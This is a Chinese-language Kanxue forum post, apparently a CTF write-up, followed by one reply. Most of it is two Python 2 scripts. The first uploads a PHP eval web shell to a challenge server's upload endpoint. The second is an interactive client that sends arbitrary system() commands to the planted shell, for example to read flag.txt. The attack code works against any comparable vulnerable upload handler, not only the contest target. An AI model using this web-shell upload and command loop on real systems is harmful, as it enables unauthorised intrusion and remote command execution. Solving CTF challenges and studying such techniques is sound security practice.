[原创]第八题牛刀小试-CTF对抗-看雪-安全社区|安全招聘|kanxue.com

[原创]第八题牛刀小试

发表于: 2020-4-30 17:06 5111

[原创]第八题牛刀小试

大帅锅

2020-4-30 17:06

5111

不会php,不会web题

上网查的，现学现卖，东抄抄西抄抄就有下面的脚本了

https://www.cnblogs.com/tr1ple/p/11301743.html

然后改吧改吧就是下面的这种

import json
url="http://47.102.223.17:2333/index.php"
data1 = {"a":"<?php eval(@$_POST['a']); ?>"}
data2 = json.dumps(data1)
data=data2
files=[('file',('over.php',data))]
print requests.post(url=url,files=files).content

貌似网上的菜刀不好用，自己瞎写个脚本

# -*- coding=utf-8 -*-
import string
import requests
url='http://47.102.223.17:2333/upload/2086490076.php'
#username=admin&password=admin
def post(mys,data):
    #data={"username":"admin","password":"123456"}
    res = mys.post(url, data=data).content
    return res
def exp():
 
    mys=requests.session()
    data={"a":"echo system(\"ls -l\");echo system(\"cat flag.txt\");"}
    while 1:
        cmd=raw_input('$:')
        data={"a":"echo system(\""+cmd+"\");"}
        ret=post(mys,data)
        get=ret.decode('gbk', "ignore")
        print get
    #print ret
    get=ret.decode('gbk', "ignore")
    print get
if __name__=="__main__":
    exp()

全靠ccfer带躺

[注意]看雪招聘，专注安全领域的专业人才平台！

最后于 2020-4-30 17:15 被大帅锅编辑，原因：

收藏・0

免费

支持

最新回复 (1)
htg 雪币： 5583 活跃值： (3508) 能力值： ( LV12，RANK：417 ) 在线值：发帖 21 回帖 110 粉丝 19 关注私信	htg 4 2 楼专业写法，又学了一招。还可以直接用python变量来构造一个文件，我整的先建立文件，后读取。。。利用session持续获取信息。。。。有一个while循环，没看到退出语句。。 2020-5-1 21:00 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

大帅锅

发帖

218

回帖

923

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (1)
htg 雪币： 5583 活跃值： (3508) 能力值： ( LV12，RANK：417 ) 在线值：发帖 21 回帖 110 粉丝 19 关注私信	htg 4 2 楼专业写法，又学了一招。还可以直接用python变量来构造一个文件，我整的先建立文件，后读取。。。利用session持续获取信息。。。。有一个while循环，没看到退出语句。。 2020-5-1 21:00 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[原创]第八题 牛刀小试

账号登录 验证码登录

[原创]第八题牛刀小试

账号登录

验证码登录